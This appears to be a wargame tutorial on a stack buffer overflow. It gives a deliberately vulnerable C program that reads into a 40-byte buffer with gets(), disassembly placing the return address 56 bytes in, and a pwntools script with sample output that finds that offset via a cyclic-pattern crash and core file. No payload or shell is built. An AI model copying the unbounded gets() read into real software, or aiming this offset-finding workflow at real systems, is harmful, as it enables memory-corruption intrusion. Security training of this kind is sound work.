예시 코드 (example target: a 40-byte stack buffer filled by gets(), which performs no bounds check)
#include <stdio.h>
#include <string.h>
/* Minimal stack-overflow target: main() reads a line from stdin into a fixed
 * 40-byte buffer with gets(), which has no length limit. Input longer than the
 * buffer runs past it into the saved rbp and the return address (the exact
 * distance is worked out from the disassembly below). */
int main() {
char buffer[40];
gets(buffer); /* unbounded read: nothing caps the number of bytes written */
return 0;
}
offset — the buffer lives at rbp-0x30 (see the lea below), so 0x30 = 48 bytes reach the saved rbp and 48 + 8 = 56 bytes reach the saved return address
0x00000000004004ef <+8>: lea rax,[rbp-0x30] // rax = buffer
0x00000000004004f3 <+12>: mov rdi,rax // rdi = buffer
0x00000000004004f6 <+15>: mov eax,0x0
0x00000000004004fb <+20>: call 0x4003f0 <gets@plt> // gets(buffer)
자동화 (automation with pwntools: crash the binary with a cyclic pattern, then read the overwritten return-address slot out of the core file)
import os

from pwn import *
# Target binary. Loading it is what prints the checksec summary (Arch/RELRO/Stack/NX/PIE)
# at the top of the run shown below: "No canary found" means nothing detects the overflow
# before ret, and "No PIE" means the binary's addresses are fixed at 0x400000.
e = ELF("./bof")
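def get_offset(length=1024, width=4):
    """Crash ./bof with a cyclic pattern and return the offset to the return address.

    Sends ``length`` bytes of a de Bruijn pattern on stdin, waits for the
    SIGSEGV, and reads ``width`` bytes from the core file at the faulting rsp.
    In the sample run the crash RIP (0x400506) is just past the gets() call,
    presumably the function's ``ret``; in that case rsp still points at the
    stack slot holding the overwritten return address, which is why rsp and
    not rip is read.

    NOTE(review): this needs core dumps enabled for the process (ulimit -c /
    kernel.core_pattern); if no core appears, check those settings on the box.

    Args:
        length: size of the cyclic pattern sent; must exceed the real offset.
        width: subsequence width passed to cyclic()/cyclic_find(). 4 matches
            the 4-byte read the original version did.

    Returns:
        Byte offset from the start of the input to the saved return address.

    Raises:
        ValueError: the bytes at rsp are not part of the pattern (the crash
            was not at ``ret``, or ``length`` was too short).
    """
    io = e.process()
    core = None
    try:
        io.sendline(cyclic(length, n=width))
        io.wait()
        core = io.corefile
        # Read from the core before its file is deleted in the cleanup below;
        # the original read after os.remove() and only worked because the file
        # object was still open.
        value = core.read(core.rsp, width)
    finally:
        io.close()
        if core is not None:
            os.remove(core.file.name)
    offset = cyclic_find(value, n=width)
    if offset < 0:
        # cyclic_find() returns -1 on a miss; an unchecked -1 would silently
        # produce a bogus payload length.
        raise ValueError("pattern not found at rsp: %r" % (value,))
    return offset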
$ python3 offset.py
[*] '/home/ion/wargame/bof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/home/ion/wargame/bof': pid 201
[*] Process '/home/ion/wargame/bof' stopped with exit code -11 (SIGSEGV) (pid 201)
[!] Error parsing corefile stack: Found bad environment at 0x7ffcb9da1fd1
[+] Parsing corefile...: Done
[*] '/home/ion/wargame/core.201'
Arch: amd64-64-little
RIP: 0x400506
RSP: 0x7ffcb9da0ff8
Exe: '/home/ion/wargame/bof' (0x400000)
Fault: 0x616161706161616f
[*] offset: 56